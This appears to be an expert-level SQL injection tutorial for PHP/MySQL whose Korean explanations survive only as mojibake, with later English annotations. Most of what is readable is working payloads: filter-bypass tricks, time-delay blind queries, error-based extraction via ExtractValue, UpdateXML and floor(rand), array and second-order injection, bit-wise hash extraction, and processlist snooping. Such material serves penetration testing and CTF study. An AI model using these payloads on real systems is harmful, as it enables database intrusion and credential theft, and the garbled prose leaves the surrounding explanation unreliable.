SQL Injection for Expert
ۼ : rubiya

SQL Injection for Expert


*  ۼǾ°?
* SQL Injection Filter Bypass
* , Array SQL Injection
* Error Based SQL Injection
* Error Based Blind SQL Injection
* Indirect SQL Injection
* Efficient Blind SQL Injection
* SQL Injection with information schema.processlist

[*]  ۼǾ°?

LeaveRet Ҽ rubiya ȭ SQL injection ⸦ ϴ Ŀ, ڵ ؼ ۼߴ.

PHP, Mysql ȯ濡 SQL Injection ݿ ˷ Ŀ ؼ ٷ̴.

rubiya805[at]gmail.com ׿ ִ.

[*] SQL Injection Filter Bypass

κ ڵ SQL Injection κ ڽ Ʈ ȣϱ ̱͸ µ ٺ  õѴ.
׷ Ű带 ͸Ұ찡 ϴµ, ̴ κ ¼ҽ ߰ų ȭ ġ ̴.
̷ 쿡  ͸ ȸؾ ϴ ؼ ϰڴ.

鹮ڸ ͸ 쿡 %09, %0a, %0b, %0c, %0d, %a0, /**/ ؼ 鹮ڸ ü ִ.

̷ Ű 쿡 () ִ.

select * from table select*from(table) ̶ ϴٴ ̴. (note: `select(*)from(table)` is a syntax error in MySQL — the bare `*` is not an expression and cannot be parenthesized; `select*from(table)` or `select(1)from(table)` is what actually parses, the parentheses standing in for the filtered whitespace)

#, -- ּ ͸ Ǿ 쿡 ;%00, /* Ҽ ִ. (Nullڴ magic_quotes_gpc )

̱Ͱ ڿ 0x, 0b ؼ 2, 16 ġȯν ȯ濡 x, b ص ȴ.

select x'61' = 'a'

Ʒó 0x, 0b 36 ص ȴ.

select conv(10,10,36)='A'

Ʒó ϴ ִ.

select substr(monthname(from_unixtime(1)),2,1)='a' // monthname(from_unixtime(1)) = 'January' only when the session time zone is at or east of UTC; west of UTC from_unixtime(1) falls on 1969-12-31 and monthname() returns 'December', so this trick is not portable across servers

ڸ 쿡 auto type cast ؼ ȸѴ.

false = 0
true = 1
true+true = 2
floor(version()) = 5 // the version string '5.x.y' is cast to 5.x, so this holds on MySQL 5.x only; on 8.x it evaluates to 8 — adjust the expected value to the target

Ϲ SQL Injection Ұ 쿡 Blind SQL Injection ؾ Ѵ.

Blind SQL Injection ϱ ؼ ڸ ߶󳻴 Ǿ ϴµ ⼭ substr Լ ͸ 찡 ִ.

޸ ͸ 쿡 select substr('asdf' from 1 for 1)='a' Ѵ.

Լ ü ͸ 쿡 substring Լ üҼ ִ.

׷ substring Լ substr ڿ ⿡ [substr(] ܾ ͸ ʴ̻ substr Լ Բ ͸ Ȯ .

׷ like ϵī带 ؼ Ʒó ȸ ִ.

select id from member where id like 'a%'
select id from member where id like 'b%'
select id from member where id like 'c%'
(note: LIKE follows the column collation, so under the default *_ci collations 'a%' also matches ids starting with 'A' and the case of the recovered value is lost; a literal _ or % inside the value recovered so far must be escaped, e.g. like 'a\_%', or it acts as a wildcard)

% ڿ ڰ ʰ select ִ ϴ ϵī̱⿡ ̷ ̴.

ù° ڸ ˾Ƴ Ŀ Ʒ ó ڿ ѱھ ָ߰ ȴ.

select id from member where id like 'ca%'
select id from member where id like 'cb%'
select id from member where id like 'cc%'

ϵī带 Ҷ cat, camel, camera ó Ͱ ÿ select 찡 ͽ÷ ۼҶ ؾ Ѵ.

like ͸ ߴٸ left Լ right Լ  ν ȸ ϴ.

Լ 1° ڷ , κ 2° ڷ ŭ ߶󳻴 Լ̴.

̸ ȥؼ Ʒ ó substr Լ ִ ̴.

select right(left('asd',1),1) = 'a'
select right(left('asd',2),1) = 's'
select right(left('asd',3),1) = 'd'

͸ ɷ Ʒ .

select mid('asd',1,1) = 'a'
select lpad('asd',1,space(1)) = 'a'
select rpad('asd',1,space(1)) = 'a'
select reverse(right(reverse('asd'),1)) = 'a'
select insert(insert('asd',1,0,space(0)),2,222,space(0)) = 'a'

concat Լ select 'a' 's' 'd' 'f'='asdf' ̷ ִ.

if Լ case(), ifnull(), nullif() ִ.

ex) select case when 1=1 then sleep(1) else 1 end

sleep Լ 쿡 benchmark() Լ ؼ select benchmark(1000000,MD5(CHAR(118))) ̷ ݺ ؼ ð ų ִ.

Ȥ select (select count(*) from information_schema.columns A, information_schema.columns B, information_schema.columns C) ̷ ð ɸ ν Ҽ ִ.

ٸ ϴµ ɸ ð ұĢ̶ ؾѴ.

[*] , Array SQL Injection

php.ini Ͽ magic_quotes_gpc = on صθ Ŭ̾Ʈ Ϳ ̱ տ 齽ø ٿش.

̴ SQL Injection ϴµ ū ɸ ǰ Ѵ.

׷ magic_quotes_gpc GET, POST, COOKIE ƿ ȴ.

magic_quotes_gpc ϰ , Array ͺ̽ Ժη ڴ 츮 հ̴.

̸׸ insert into uploadfile values('filename','path') 쿡 filename ſ


insert into uploadfile values('asdf','fdsa'),(version(),'1234'),('asdf','path') ̷ ۵ ִ ̴.

insert insert into table values('asdf',1),('fdsa',2),('zxc',3) ̷ ÿ ִٴ ٸ ȸ ˾Ƶ.

[*] Error Based SQL Injection

޼ ϴ SQL Injection ޼ ִ ȯ濡

ѹ ϴ ͸ ѹ ֱ α׵ Գ ϴµ ҿǴ ð Ǽ Blind SQL Injection ϰ .

SQLi mssql ȯ濡 ϴ.

ٸ ϰԵǸ ٰ ޼ ѹ վֱ ̴.


select * from table where 'asdf'=123

̶ 쿡

['asdf' int ϴ!]

޼ .

׷ mysql auto type cast ֱ ٸ ص ƹ .

ϴ ޼ ѹ ؼ

select sum(5),concat(version(),floor(rand(0)*2))as a from information_schema.tables group by a // expected error: Duplicate entry '<version>1' for key 'group_key'; rand(0) is seeded, so the collision is deterministic, but the driving table must yield at least 3 rows (information_schema.tables always does)

̷ ؾѴ.

Ű带 ְ Ű ؼ ̴.

Ʒ  ̴.

select * from (select name_const(version(),1),name_const(version(),1))a // expected error: Duplicate column name '<version>'; name_const() demands constant arguments, and many later MySQL builds reject version() here with "Incorrect arguments to NAME_CONST", so treat this payload as version-dependent

select * from table where 1=1 and ExtractValue(1,concat(0x01,version())) // MySQL >= 5.1.5; the XPATH error text shows only 32 characters, so prefer a printable separator such as 0x7e and page longer values through substr()

select * from table where 1=1 and UpdateXML(1,concat(0x01,version()),1) // same constraints as ExtractValue: MySQL >= 5.1.5 and a 32-character limit on the leaked error text

select * from table where (@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)

ȯ濡 ° .

[*] Error Based Blind SQL Injection

Ȳ 幮 ݱ ˾Ƶּ ܰ 丸 ˾Ƶ.

select * from table where 1 and if(1=1,1,(select 1 union select 2))

select * from table where 1 and if(1=2,1,(select 1 union select 2))

ù° if 1=1 Ǹ鼭 ܼ 1 ȯѴ.

ι° if Ǹ鼭 select 1 union select 2 ϰ ǰ,

ȯϸ鼭 ߻ϰ ȴ. (thx to hellsonic)

[*] Indirect SQL Injection

insert into member values('guest','123','qwe') ִٰ غ. (INSERT takes no WHERE clause; the statement is shown as the application would issue it)

[guest'] Էϸ php ܿ [guest\'] Ŀ mysql ν ġ ϵ ̴.

׷ mysql ȸϸ ( ݸ غ 翬ϰԵ) [guest'] ִ.

[guest'] α Ѵٸ ̵ [guest'] ȴ.

⼭ α׸ ٴ ϴ ൿ ̵ ִ ڵ尡 ִٸ?

̹ [guest'] ġ ȴ.

php.ini magic_quotes_runtime ɼ off ϶ ϴ. (thx to dmbs335@LeaveRet) (note: magic_quotes_gpc/magic_quotes_runtime were removed in PHP 5.4, but this second-order injection does not depend on them — it occurs whenever a value read back from the database is concatenated into a new query, so the second query must use prepared statements or escaping as well)

[*] Efficient Blind SQL Injection

Blind SQL Injection 쿡 ڸ ˾Ƴ 90ȸ Ѵ. (ƽŰ 32~127)

׷ ȿ ۼϸ ڴ 7ȸ ϴ.

ڸ 10 ȯְ ٽ 2 ȯ Ŀ lpad Լ 7ڷ ָ ȴ.

̷ε Ʒ .

select substr(lpad(bin(ascii(substr('asdf',1,1))),7,0),1,1)

˾Ƴϴ md5 hash 16 ̶ Ȯ ִٸ Ʒ ؼ ڴ 4ȸ ȿ̰ ϴ.

select substr(lpad(bin(if(ascii(substring(pw,1,1))<90,ascii(substring(pw,1,1))-48,ascii(substring(pw,1,1))-87)),4,0),1,1) // assumes lowercase hex: '0'..'9' (48..57) map to 0..9 via -48 and 'a'..'f' (97..102) map to 10..15 via -87; uppercase 'A'..'F' (65..70) would take the <90 branch and give 17..22, which does not fit in 4 bits, so wrap the column in lower() when the case is not guaranteed

[*] SQL Injection with information schema.processlist

Ʈ SQL Injection Ҷ information schema.tables ̺ ̺  ̺ ϴ ִ ˱Ⱑ .

ᱹ ̸ ̺ ȫӿ شҼ ִ.

̷ information schema.processlist ̺ ؼ ϴ ִ ̺ ã ִ.

information schema.processlist ̺ صΰ ִ.

̷ select info from information_schema.processlist ؼ , غ ʾ ̽ ϵ ݺ õϸ ٸ ڰ ȸ Ұ̴. (note: without the PROCESS privilege, information_schema.processlist only lists the current account's own threads, so other users' queries are visible only when the application account was granted PROCESS or SUPER; the Info column is also truncated, so long queries may need repeated sampling)

ٸ ڰ α϶ 츮 ش ȸϴµ ߴٸ ȸ ִ Į ̺ ѹ ִ°̴.

[+] ħ

ο ϴ ſ ۰Գ Ǿ⸦ ٶ ģ.





